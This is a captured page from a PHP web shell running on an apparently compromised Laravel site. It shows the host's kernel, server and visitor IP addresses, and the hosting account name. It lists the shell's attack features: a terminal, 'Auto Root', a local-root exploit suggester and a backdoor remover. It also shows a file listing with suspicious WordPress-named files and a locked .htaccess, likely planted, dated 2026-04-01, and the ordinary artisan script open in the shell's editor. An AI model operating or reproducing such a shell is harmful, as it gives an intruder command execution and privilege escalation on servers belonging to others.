Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data /
core /
Delete
Unzip
Name
Size
Permission
Date
Action
app
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
bootstrap
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
config
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
database
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
resources
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
routes
[ DIR ]
drwxr-xr-x
2025-02-03 10:48
storage
[ DIR ]
drwxrwxr-x
2022-09-13 11:48
tests
[ DIR ]
drwxr-xr-x
2022-09-13 11:48
vendor
[ DIR ]
drwxr-xr-x
2022-09-13 12:22
.DS_Store
8
KB
-rw-r--r--
2022-10-08 13:56
.editorconfig
220
B
-rw-r--r--
2021-10-03 08:49
.env
841
B
-rw-r--r--
2025-07-18 12:23
.env.example
811
B
-rw-r--r--
2021-10-03 08:49
.gitattributes
111
B
-rw-r--r--
2021-10-03 08:49
.gitignore
191
B
-rw-r--r--
2021-10-03 08:49
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.styleci.yml
181
B
-rw-r--r--
2021-10-03 08:49
README.md
3.69
KB
-rw-r--r--
2021-10-03 08:49
artisan
1.65
KB
-rw-r--r--
2021-10-03 08:49
composer.json
2.35
KB
-rw-r--r--
2022-09-12 08:27
composer.lock
345.86
KB
-rw-r--r--
2022-09-13 12:22
package-lock.json
508.98
KB
-rw-r--r--
2021-10-03 08:49
package.json
730
B
-rw-r--r--
2021-10-03 08:49
phpunit.xml
1.17
KB
-rw-r--r--
2021-10-03 08:49
server.php
563
B
-rw-r--r--
2021-10-03 08:49
webpack.mix.js
549
B
-rw-r--r--
2021-10-03 08:49
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
#!/usr/bin/env php <?php define('LARAVEL_START', microtime(true)); /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader | for our application. We just need to utilize it! We'll require it | into the script here so that we do not have to worry about the | loading of any our classes "manually". Feels great to relax. | */ require __DIR__.'/vendor/autoload.php'; $app = require_once __DIR__.'/bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Artisan Application |-------------------------------------------------------------------------- | | When we run the console application, the current CLI command will be | executed in this console and the response sent back to a terminal | or another output device for the developers. Here goes nothing! | */ $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $status = $kernel->handle( $input = new Symfony\Component\Console\Input\ArgvInput, new Symfony\Component\Console\Output\ConsoleOutput ); /* |-------------------------------------------------------------------------- | Shutdown The Application |-------------------------------------------------------------------------- | | Once Artisan has finished running, we will fire off the shutdown events | so that any final work may be done by the application before we shut | down the process. This is the last thing to happen to the request. | */ $kernel->terminate($input, $status); exit($status);